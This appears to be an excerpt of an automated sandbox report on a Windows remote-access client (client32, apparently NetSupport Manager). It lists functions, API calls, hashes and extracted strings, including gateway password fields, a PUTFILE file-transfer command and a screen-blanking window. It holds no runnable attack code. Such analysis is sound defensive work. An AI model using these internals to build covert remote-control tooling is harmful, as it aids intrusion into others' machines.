Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
String ID:
API String ID: 3255624709-0
Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762

Function 685B28E1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 685B8BA8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 685B8BBD
UnhandledExceptionFilter.KERNEL32(685D427C), ref: 685B8BC8
GetCurrentProcess.KERNEL32(C0000409), ref: 685B8BE4
TerminateProcess.KERNEL32(00000000), ref: 685B8BEB

Strings

d+Yh, xrefs: 685B8B54

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: d+Yh
API String ID: 2579439406-2299009342
Opcode ID: da225835752c447bfac5130adb1a18d82d3ac8a79ef07ff9ebfaef77dd60aca0
Instruction ID: 5b7a44b04b108a12c82899201127595078470077ed4cc399642a983bf8f4aaf3
Opcode Fuzzy Hash: da225835752c447bfac5130adb1a18d82d3ac8a79ef07ff9ebfaef77dd60aca0
Instruction Fuzzy Hash: B521BBB4850206EFCF01DF69E488ACD7BB8FB4A314F82551AEC0897380E7B499858F0D

Function 685C1CC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,685C232A,?,685B7F44,?,000000BC,?), ref: 685C1D00
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,685C232A,?,685B7F44,?,000000BC,?), ref: 685C1D29
GetACP.KERNEL32(?,?,685C232A,?,685B7F44,?,000000BC,?), ref: 685C1D3D

Strings

ACP, xrefs: 685C1CD0
OCP, xrefs: 685C1CE1

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 391be5ff22062c71fe94a954f7c5aa84a1c6d61f7630c48c74d1631c59319b86
Instruction ID: c4806d2fb8bd5a795361a76b1cf2bb9d6b6adad56403d54b29346d9efe38b374
Opcode Fuzzy Hash: 391be5ff22062c71fe94a954f7c5aa84a1c6d61f7630c48c74d1631c59319b86
Instruction Fuzzy Hash: 9B01A23554560ABEEB01DBB4DC55B9E37B8AF41369FF0849DF911E1080EB70CA41CAAA

Function 1101D180 Relevance: 4.6, APIs: 3, Instructions: 82timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1101D213
SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
GetLocalTime.KERNEL32(00000002), ref: 1101D25C

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LocalRectTime__time64
String ID:
API String ID: 394334608-0
Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51

Function 11059270 Relevance: 4.5, APIs: 3, Instructions: 19windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
Instruction ID: 5b7cf9c0659eada95368eb5e30aa7fe70508538aa6eda4fa9add4fab25305eb2
Opcode Fuzzy Hash: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
Instruction Fuzzy Hash: D2D05E79684308BBE2159BD0CC4AFADB7ACD70CB16F200166FB01961C0DAB169008B76

Function 110A9240 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030FDE,00000000), ref: 110A9260

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
Instruction ID: e696868f72d0725410e46aa1b0c9657244e5a899ecae170b9f1eee7695916dac
Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
Instruction Fuzzy Hash: D5E0CDF5A0820CBFA304DEF99CC1C6BB79CD5063687100399F629C3141E5719D109770

Function 685A48E0 Relevance: 59.8, APIs: 17, Strings: 17, Instructions: 327COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A4915

Part of subcall function 685B36F5: __fsopen.LIBCMT ref: 685B3702

GetLastError.KERNEL32 ref: 685A4943
_fseek.LIBCMT ref: 685A4963
_fseek.LIBCMT ref: 685A497B
GetLastError.KERNEL32 ref: 685A4988
_free.LIBCMT ref: 685A4CB1
SetLastError.KERNEL32(00000000), ref: 685A4CCA

Strings

ctl_putfile - _topen FAILED (error: %d), xrefs: 685A494A
DATA=, xrefs: 685A4BF2
Gateway_Operator, xrefs: 685A4A47
FLEN=%d, xrefs: 685A4B3F
OFFSET=%d, xrefs: 685A4BB6
ctl_putfile - _filelength FAILED (error: %d), xrefs: 685A498F
putfile - _read FAILED (error: %d), xrefs: 685A49E1
ctl_putfile - empty file (%s), xrefs: 685A49AC
FNAME=%s, xrefs: 685A4BA1
ON=%s, xrefs: 685A4AFF
Gateway_Password, xrefs: 685A4A63
Gateway_Gsk, xrefs: 685A4A37
CMD=PUTFILE, xrefs: 685A4AAD
SUB=%s, xrefs: 685A4B6D
MORE=%d, xrefs: 685A4C36
GSK=%s, xrefs: 685A4AD1
PWD=%s, xrefs: 685A4B21

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_fseek$__fsopen_free_memset
String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
API String ID: 908761794-2149975586
Opcode ID: 039bff6ecf51de9fb99d87edbb5e941ea2798d97290c7d9418abb4dc27d0e6b8
Instruction ID: 7111f359fd206deefff7ffb402162e1aaed40b04c83980efe32d8c786de002e9
Opcode Fuzzy Hash: 039bff6ecf51de9fb99d87edbb5e941ea2798d97290c7d9418abb4dc27d0e6b8
Instruction Fuzzy Hash: F1B18FB5C40218ABDB20DBF8CC94FEEB7B8AF94304F904159E919A7245EB315E44CBA5

Function 6859CDB0 Relevance: 52.7, APIs: 11, Strings: 19, Instructions: 247COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6859CDF0
EnterCriticalSection.KERNEL32(685DB898,00000000,?), ref: 6859CE13
InterlockedIncrement.KERNEL32(-685DCB16), ref: 6859CE29
InterlockedIncrement.KERNEL32(-685DCB86), ref: 6859CE2F

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

LeaveCriticalSection.KERNEL32(685DB898), ref: 6859CE36
_free.LIBCMT ref: 6859CF2C
_free.LIBCMT ref: 6859CFD7

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 6859D029
_free.LIBCMT ref: 6859D0CA
_free.LIBCMT ref: 6859D109
_free.LIBCMT ref: 6859D115

Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090

Strings

REQUSERNAME=1, xrefs: 6859CF60
CMD=CTL_BROWSE, xrefs: 6859CEED
APPTYPE=%d, xrefs: 6859D08A
Gateway_Name, xrefs: 6859CE48
WANTSHELP=1, xrefs: 6859CF46
SERVICETYPE=CLASS, xrefs: 6859D057
Gateway_Password, xrefs: 6859CE93
CTLTYPE=%d, xrefs: 6859CFE8
GSK, xrefs: 6859CE5C
CONTEXT=%s, xrefs: 6859CFCB
USER=%s, xrefs: 6859D01D
REQHOSTNAME=1, xrefs: 6859CF74
SERVICETYPE=DEPT, xrefs: 6859D06C
Gateway_Gsk, xrefs: 6859CE63, 6859CE6B
MATCH_NAME=%s, xrefs: 6859CF20
Gateway_Username, xrefs: 6859CE77
GSK=%s, xrefs: 6859CF98
CSPEC=%s, xrefs: 6859D0BE
PWD=%s, xrefs: 6859D042

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$CriticalIncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
API String ID: 2543302378-3410294771
Opcode ID: 091711460f17333c7393b79fcb44e37d989934529a393a86f32887112bb153fa
Instruction ID: 2a16e4c8489222f0975180bf63dd6f651adaacb0976951d4aee4bcd3784d2b38
Opcode Fuzzy Hash: 091711460f17333c7393b79fcb44e37d989934529a393a86f32887112bb153fa
Instruction Fuzzy Hash: 39916776C40259ABDF21DBA4CC80FFEB778AB44204F8445D9E94A77141EB305E84CFA4

Function 11139060 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 229registrylibraryloaderCOMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
GetStockObject.GDI32(00000004), ref: 111390C5
RegisterClassA.USER32(?), ref: 111390D9
GetLastError.KERNEL32 ref: 1113914F
GetLastError.KERNEL32 ref: 1113916B
CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
UpdateWindow.USER32(?), ref: 1113929B
GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322

Strings

BlankWnd x%x created, w=%d, h=%d, xrefs: 111391E9
m_hWnd, xrefs: 1113921B, 11139250, 1113928A, 111392E0
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11139216, 1113924B, 11139285, 111392DB
BlankHeight, xrefs: 1113910B
DwmEnableComposition, xrefs: 111392B0
Error setting blankwnd timer, e=%d, xrefs: 1113930B
NSMBlankWnd, xrefs: 111390D2, 1113915B, 11139171, 111391CB
Error. BlankWnd not created, e=%d, xrefs: 11139329
Info. Class %s already registered, xrefs: 1113915C
BlankWidth, xrefs: 111390FA
Error. RegisterClass(%s) failed, e=%d, xrefs: 11139172
Blank, xrefs: 111391C6
_debug, xrefs: 111390FF, 1113911C

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1116282658-3566152235
Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55

Function 110433B0 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 327windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457

ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
_memset.LIBCMT ref: 11043445
_strncpy.LIBCMT ref: 11043473
wsprintfA.USER32 ref: 11043558
_strncpy.LIBCMT ref: 110435A1
_strncpy.LIBCMT ref: 110435D5
SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
BringWindowToTop.USER32(?), ref: 110436CA
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8

Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E

MessageBeep.USER32(000000FF), ref: 11043705

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetDlgItem.USER32(?,00000002), ref: 1104372A
SetFocus.USER32(00000000), ref: 11043731

Strings

*UserAckRejectDefault, xrefs: 1104370F
Client, xrefs: 110434E3, 11043632
m_hWnd, xrefs: 1104365C
AckDlgTimeOut, xrefs: 1104362D
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11043657
AckDlgDisplayText, xrefs: 110434DE
*UserAckRejectWording, xrefs: 11043607
*UserAckWording, xrefs: 110434B4
helpdesk.ico, xrefs: 110433DC

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemWindow$Text_strncpy$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimer__wcstoi64_memsetwsprintf
String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
API String ID: 1946598539-1930157642
Opcode ID: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
Instruction ID: ded1bb61fb3941f1bcfc90b6e22c684d82d72c36ad168629116a92ba92965352
Opcode Fuzzy Hash: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
Instruction Fuzzy Hash: 83B12774B40316AFE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9848B90

Function 1104F2F0 Relevance: 44.1, APIs: 18, Strings: 7, Instructions: 316filepipethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 1104D870: SetEvent.KERNEL32(?), ref: 1104D927
Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D98D
Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D99F

wsprintfA.USER32 ref: 1104F394
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F3BD
GetLastError.KERNEL32 ref: 1104F3C8
SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F3F5
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,7E4636A2), ref: 1104F40B
CloseHandle.KERNEL32(00000000,Function_0003C050,00000001,00000000), ref: 1104F4B5
GetWindowThreadProcessId.USER32(?,?), ref: 1104F4C3
OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F4D7
GetPriorityClass.KERNEL32(00000000), ref: 1104F4EC

